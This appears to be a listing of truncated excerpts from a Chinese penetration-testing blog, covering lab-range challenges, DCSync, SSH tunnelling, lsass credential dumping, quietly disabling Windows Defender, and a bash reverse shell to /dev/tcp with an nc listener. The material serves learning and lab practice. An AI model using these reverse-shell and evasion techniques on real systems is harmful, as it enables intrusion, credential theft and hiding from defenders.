靶标介绍： Certify 是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag，分布于不同的靶机。 内网地址 Host or FQDN 简要描述 ...

DCSync Attack 在 Active Directory 中，每个域控制器都存储着完整的目录数据库。为了保证数据的一致性和可用性，域控制器之间会进行定期的数据同步。默认情况下，域内不同 DC 每隔 15 分钟会进行一次数据同步，当一个 DC 从另外一个 DC 同步数据时，它会使用目录复制服务远程协议 (MS-DRSR) 发送 DSGetNCChanges 请求，来对另外一台域控中的...

靶标介绍： Tsclient 是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 3 个 flag，分布于不同的靶机。 内网地址 Host or FQDN 简要描述 ...

Overiew SSH 隧道（也称为 SSH 端口转发）是通过在现有 SSH 会话中传输附加数据流的方式实现的，能将其他 TCP/IP 端口的网络数据通过 SSH 连接进行转发，并且自动提供了相应的加密及解密服务。由于数据流量被定向到加密的 SSH 连接内流动，因此在传输过程中不会被窃听或拦截。 SSH 隧道一般通过本地端口转发、远程端口转发、动态端口转发或创建 TUN/TAP 隧道来实...

Quick install MSF (Metasploit Framework) 一键安装，以下脚本调用将导入 Rapid7 签名密钥并为支持的 Linux 和 macOS 系统设置程序包： curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit...

Introduce 靶标介绍： Unauthorized是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag，分布于不同的靶机。 Intranet Address Host ...

由于卡巴斯基（Kaspersky）、小红伞（Avira Antivirus）等杀软均对 lsass.exe 进程进行了保护，会导致微软的工具以及巴斯基的 kldumper.exe 都无法成功转储 lsass.exe 内存的情况。 注：任然可以通过制造蓝屏来获取所有内存的文件 MEMORY.DMP 然后再提出 lsass 进一步读取。 Mimikatz privilege mod...

Remote Desktop Services 查询远程桌面服务的端口：（0xd3d 十六进制转十进制 3389） PS C:\Windows\System32> REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNum...

随着 Windows 的安全性在不断的提升，彻底关闭 Windows Defender 变得越来越困难，即使手动关闭 “篡改防护 (Tamper Protection)” 并获取到了 TrustedInstaller 权限也很难将其关闭。 并不推荐完全关闭杀软，因为这样做不仅不容易成功，而且动静很大，用户肯定会发现（关闭后会通知栏会弹出信息，告知用户 defender 已经关闭了）。一般情...

Reverse Shell (semi-interactive shell) 一般反弹 shell 的命令： [root@centos ~]# /bin/bash -i >& /dev/tcp/192.168.10.11/4444 0>&1 接收到半交互式的 shell： kali@kali:~$ nc -lvnp 4444 Listening on ...